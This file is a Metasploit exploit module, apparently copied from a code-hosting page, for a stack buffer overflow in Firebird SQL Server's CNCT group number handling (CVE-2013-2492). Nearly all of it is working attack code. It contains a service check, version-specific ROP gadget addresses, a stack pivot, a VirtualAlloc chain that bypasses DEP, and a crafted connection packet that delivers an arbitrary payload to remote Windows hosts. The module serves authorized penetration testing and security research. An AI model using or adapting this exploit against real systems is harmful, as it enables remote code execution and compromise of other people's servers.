Path: blob/master/modules/exploits/windows/misc/fb_cnct_group.rb
19721 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking7include Msf::Exploit::Remote::Tcp89def initialize10super(11'Name' => 'Firebird Relational Database CNCT Group Number Buffer Overflow',12'Description' => %q{13This module exploits a vulnerability in Firebird SQL Server. A specially14crafted packet can be sent which will overwrite a pointer allowing the attacker to15control where data is read from. Shortly, following the controlled read, the16pointer is called resulting in code execution.1718The vulnerability exists with a group number extracted from the CNCT information,19which is sent by the client, and whose size is not properly checked.2021This module uses an existing call to memcpy, just prior to the vulnerable code,22which allows a small amount of data to be written to the stack. A two-phases23stack pivot allows to execute the ROP chain which ultimately is used to execute24VirtualAlloc and bypass DEP.25},26'Author' => 'Spencer McIntyre',27'Arch' => ARCH_X86,28'Platform' => 'win',29'References' => [30[ 'CVE', '2013-2492' ],31[ 'OSVDB', '91044' ]32],33'DefaultOptions' => {34'EXITFUNC' => 'seh'35},36'Payload' => {37# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]38'Prepend' => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",39'Space' => 400,40'BadChars' => "\x00\x0a\x0d"41},42'Targets' => [43# pivots are pointers to stack pivots of size 0x2844[ 'Windows FB 2.5.2.26539', { 'pivot' => 0x005ae1fc, 'rop_nop' => 0x005b0384, 'rop_pop' => 0x4a831344 } ],45[ 'Windows FB 2.5.1.26351', { 'pivot' => 0x4add2302, 'rop_nop' => 0x00424a50, 'rop_pop' => 0x00656472 } ],46[ 'Windows FB 2.1.5.18496', { 'pivot' => 0x4ad5df4d, 'rop_nop' => 0x0042ba8c, 'rop_pop' => 0x005763d5 } ],47[ 'Windows FB 2.1.4.18393', { 'pivot' => 0x4adf4ed5, 'rop_nop' => 0x00423b82, 'rop_pop' => 0x4a843429 } ],48[ 'Debug', { 'pivot' => 0xdead1337, 'rop_nop' => 0xdead1337, 'rop_pop' => 0xdead1337 } ]49],50'DefaultTarget' => 0,51'Privileged' => true,52'DisclosureDate' => 'Jan 31 2013',53'Notes' => {54'Stability' => [ CRASH_SERVICE_RESTARTS ],55},56)5758register_options([Opt::RPORT(3050)])59end6061def check62begin63connect64rescue65vprint_error("Unable to get a connection")66return Exploit::CheckCode::Unknown67end6869filename = "C:\\#{rand_text_alpha(12)}.fdb"70username = rand_text_alpha(7)7172check_data = ""73check_data << "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"74check_data << "\x00\x00\x00\x13"75check_data << filename76check_data << "\x00\x00\x00\x00\x04\x00\x00\x00\x24"77check_data << "\x01\x07" << username << "\x04\x15\x6c\x6f\x63\x61\x6c"78check_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"79check_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"80check_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"81check_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"82check_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"83check_data << "\xff\xff\x80\x0c\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"84check_data << "\x00\x00\x00\x08"8586sock.put(check_data)87data = sock.recv(16)88disconnect8990opcode = data.unpack("N*")[0]91if opcode == 3 # Accept92return Exploit::CheckCode::Detected93end9495return Exploit::CheckCode::Safe96end9798def stack_pivot_rop_chain99case target.name100when 'Windows FB 2.5.2.26539'101rop_chain = [1020x005e1ea4, # MOV EAX,EDI # RETN [fbserver.exe]1030x0059ffeb, # POP EBP # RETN [fbserver.exe]1040x0000153c, # 0x0000153c-> ebp1050x005d261f, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]1060x0059fe1f, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]107].pack("V*")108when 'Windows FB 2.5.1.26351'109rop_chain = [1100x005e1ab8, # MOV EAX,EDI # RETN [fbserver.exe]1110x0059650b, # POP EBP # RETN [fbserver.exe]1120x0000153c, # 0x0000153c-> ebp1130x005cf6ff, # ADD EBP,EAX # MOV EBX,59FFFFC9 # RETN [fbserver.exe]1140x0059a3db, # MOV ESP,EBP # POP EBP # RETN [fbserver.exe]115].pack("V*")116when 'Windows FB 2.1.5.18496'117rop_chain = [1180x0055b844, # MOV EAX,EDI # RETN [fbserver.exe]1190x4a86ee77, # POP ECX # RETN [icuuc30.dll]1200x000001c0, # 0x000001c0-> ecx1210x005aee63, # ADD EAX,ECX # RETN [fbserver.exe]1220x4a82d326, # XCHG EAX,ESP # RETN [icuuc30.dll]123].pack("V*")124when 'Windows FB 2.1.4.18393'125rop_chain = [1260x0042264c, # MOV EAX,EDI # RETN [fbserver.exe]1270x4a8026e1, # POP ECX # RETN [icuuc30.dll]1280x000001c0, # 0x000001c0-> ecx1290x004c5499, # ADD EAX,ECX # RETN [fbserver.exe]1300x4a847664, # XCHG EAX,ESP # RETN [icuuc30.dll]131].pack("V*")132when 'Debug'133rop_chain = [ ].fill(0x41414141, 0..5).pack("V*")134end135return rop_chain136end137138def final_rop_chain139# all rop chains in here created with mona.py, thanks corelan!140case target.name141when 'Windows FB 2.5.2.26539'142rop_chain = [1430x4a831344, # POP ECX # RETN [icuuc30.dll]1440x0065f16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]1450x005989f0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]1460x004666a6, # XCHG EAX,ESI # RETN [fbserver.exe]1470x00431905, # POP EBP # RETN [fbserver.exe]1480x00401932, # & push esp # ret [fbserver.exe]1490x4a844ac0, # POP EBX # RETN [icuuc30.dll]1500x00001000, # 0x00001000-> ebx1510x4a85bfee, # POP EDX # RETN [icuuc30.dll]1520x00001000, # 0x00001000-> edx1530x005dae9e, # POP ECX # RETN [fbserver.exe]1540x00000040, # 0x00000040-> ecx1550x0057a822, # POP EDI # RETN [fbserver.exe]1560x005b0384, # RETN (ROP NOP) [fbserver.exe]1570x0046f8c3, # POP EAX # RETN [fbserver.exe]1580x90909090, # nop1590x00586002, # PUSHAD # RETN [fbserver.exe]160].pack("V*")161when 'Windows FB 2.5.1.26351'162rop_chain = [1630x00656472, # POP ECX # RETN [fbserver.exe]1640x0065b16c, # ptr to &VirtualAlloc() [IAT fbserver.exe]1650x00410940, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]1660x0063be76, # XCHG EAX,ESI # RETN [fbserver.exe]1670x0041d1ae, # POP EBP # RETN [fbserver.exe]1680x0040917f, # & call esp [fbserver.exe]1690x4a8589c0, # POP EBX # RETN [icuuc30.dll]1700x00001000, # 0x00001000-> ebx1710x4a864cc3, # POP EDX # RETN [icuuc30.dll]1720x00001000, # 0x00001000-> edx1730x0064ef59, # POP ECX # RETN [fbserver.exe]1740x00000040, # 0x00000040-> ecx1750x005979fa, # POP EDI # RETN [fbserver.exe]1760x00424a50, # RETN (ROP NOP) [fbserver.exe]1770x4a86052d, # POP EAX # RETN [icuuc30.dll]1780x90909090, # nop1790x005835f2, # PUSHAD # RETN [fbserver.exe]180].pack("V*")181when 'Windows FB 2.1.5.18496'182rop_chain = [1830x005763d5, # POP EAX # RETN [fbserver.exe]1840x005ce120, # ptr to &VirtualAlloc() [IAT fbserver.exe]1850x004865a4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fbserver.exe]1860x004cf4f6, # XCHG EAX,ESI # RETN [fbserver.exe]1870x004e695a, # POP EBP # RETN [fbserver.exe]1880x004d9e6d, # & jmp esp [fbserver.exe]1890x4a828650, # POP EBX # RETN [icuuc30.dll]1900x00001000, # 0x00001000-> ebx1910x4a85bfee, # POP EDX # RETN [icuuc30.dll]1920x00001000, # 0x00001000-> edx1930x00590328, # POP ECX # RETN [fbserver.exe]1940x00000040, # 0x00000040-> ecx1950x4a8573a1, # POP EDI # RETN [icuuc30.dll]1960x0042ba8c, # RETN (ROP NOP) [fbserver.exe]1970x00577605, # POP EAX # RETN [fbserver.exe]1980x90909090, # nop1990x004530ce, # PUSHAD # RETN [fbserver.exe]200].pack("V*")201when 'Windows FB 2.1.4.18393'202rop_chain = [2030x4a843429, # POP ECX # RETN [icuuc30.dll]2040x005ca120, # ptr to &VirtualAlloc() [IAT fbserver.exe]2050x0055a870, # MOV EAX,DWORD PTR DS:[ECX] # RETN [fbserver.exe]2060x004cecf6, # XCHG EAX,ESI # RETN [fbserver.exe]2070x004279c0, # POP EBP # RETN [fbserver.exe]2080x0040747d, # & call esp [fbserver.exe]2090x004ebef1, # POP EBX # RETN [fbserver.exe]2100x00001000, # 0x00001000-> ebx2110x4a864c5e, # POP EDX # RETN [icuuc30.dll]2120x00001000, # 0x00001000-> edx2130x004eaa3b, # POP ECX # RETN [fbserver.exe]2140x00000040, # 0x00000040-> ecx2150x4a8330a2, # POP EDI # RETN [icuuc30.dll]2160x00423b82, # RETN (ROP NOP) [fbserver.exe]2170x0046b5b1, # POP EAX # RETN [fbserver.exe]2180x90909090, # nop2190x004c8cfc, # PUSHAD # RETN [fbserver.exe]220].pack("V*")221when 'Debug'222rop_chain = [ ].fill(0x41414141, 0..17).pack("V*")223end224return rop_chain225end226227def exploit228connect229230rop_nop_sled = [ ].fill(target['rop_nop'], 0..16).pack("V*")231232# this data gets written to the stack via memcpy, no more than 32 bytes can be written233overwrite_and_rop_chain = [ target['rop_pop'] ].pack("V") # POP to skip the 4 bytes of the original pivot234overwrite_and_rop_chain << [ (target['pivot'] - 8) ].pack("V") # MOV EDX,DWORD PTR DS:[EAX+8]235overwrite_and_rop_chain << stack_pivot_rop_chain236237filename = "C:\\#{rand_text_alpha(13)}.fdb"238evil_data = "\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x24"239evil_data << "\x00\x00\x00\x14"240evil_data << filename241evil_data << "\x00\x00\x00\x04\x00\x00\x00\x24"242evil_data << "\x05\x20"243evil_data << overwrite_and_rop_chain244evil_data << "\x15\x6c\x6f\x63\x61\x6c"245evil_data << "\x68\x6f\x73\x74\x2e\x6c\x6f\x63\x61\x6c\x64\x6f\x6d\x61\x69\x6e"246evil_data << "\x06\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02"247evil_data << "\x00\x00\x00\x05\x00\x00\x00\x02\x00\x00\x00\x0a\x00\x00\x00\x01"248evil_data << "\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x04\xff\xff\x80\x0b"249evil_data << "\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x06"250evil_data << "\x41\x41\x41\x41\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x05"251evil_data << "\x00\x00\x00\x08\x00\x41\x41\x41"252evil_data << rop_nop_sled253evil_data << final_rop_chain254evil_data << payload.encoded255256print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")257sock.put(evil_data)258259disconnect260end261end262263264